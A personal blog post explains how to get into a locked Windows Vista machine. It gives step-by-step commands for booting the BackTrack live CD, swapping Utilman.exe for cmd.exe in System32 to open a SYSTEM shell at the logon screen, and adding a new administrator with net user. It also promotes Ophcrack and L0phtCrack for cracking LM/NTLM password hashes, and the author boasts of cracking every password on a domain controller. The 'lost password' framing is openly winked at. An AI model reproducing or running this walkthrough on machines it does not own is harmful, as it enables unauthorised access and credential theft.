PaulSpoerry.com

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.

What is BackTrack?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window

Here’s a quick and dirty way to make a new user account.

Boot into Backtrack and open a shell prompt:

• cd /mnt (change directory to mounted drives)

• ls (get the list of mounted drives)

• cd sda1 (sda1 is the main hard drive)

• cd Windows/ (change to the windows directory)

• cd System32/ (change to the system directory)

• mv Utilman.exe Utilman.old (backup original file)

• cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)

• reboot

Once rebooted, at vista logon screen do the following:

• Press Windows key + U

• To invoke Utility Manager ( A.K.A. CMD.exe)

• Cmd.exe will spawn with ‘System’ privileges.

• c:\>net user S00perAdmin mypassword /add

• c:\>net localgroup administrators S00perAdmin /add

• Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.

The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords.

After you download the 462mb .iso and burn it to a CD, just restart your computer and boot up the Live CD. Once the CD boots, blamo… Ophcrack automatically loads and is on its way to cracking your password.

(screenshot of ophcrack on Linux cracking Windows passwords)

Features:

• Runs on Windows, Linux and Mac OS X (intel).
• Cracks LM and NTLM hashes.
• Free tables available for alphanumeric LM hashes.
• Loads hashes from local SAM, remote SAM.
• Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

I’ve yet to try this live bootable version, but I used l0phtcrack (now LC5 and no longer produced since the company that made it was bought by Symantec) a few years ago and retrieved 99% of the passwords off a backup domain controller in something like 12 hours (using a not-so-powerful desktop to do the cracking).

Get ophcrack Live CD. FYI – you can still get l0phtcrack (aka LC5) from mirrors like sectools.org.

STUMBLEUPON UPDATE:

A couple people have asked if this really works. I just want to re-iterate that this DOES work. It requires physical access to the machine, but if you have physical access you can literally crack every password on a machine in a very short time. As I said above, I used it on a backup domain controller and in about 12 hours cracked every single password on the BDC.

Why crack passwords when you can just create a new Admin account?

Most people tell me they simply “lost” their password. If that’s the case you can use some free tools to create a new Administrator account. With this account you can simply change the existing accounts password, use the new Admin account, or… well… do anything you want. Read more in my article: Hack Vista – Create a new admin account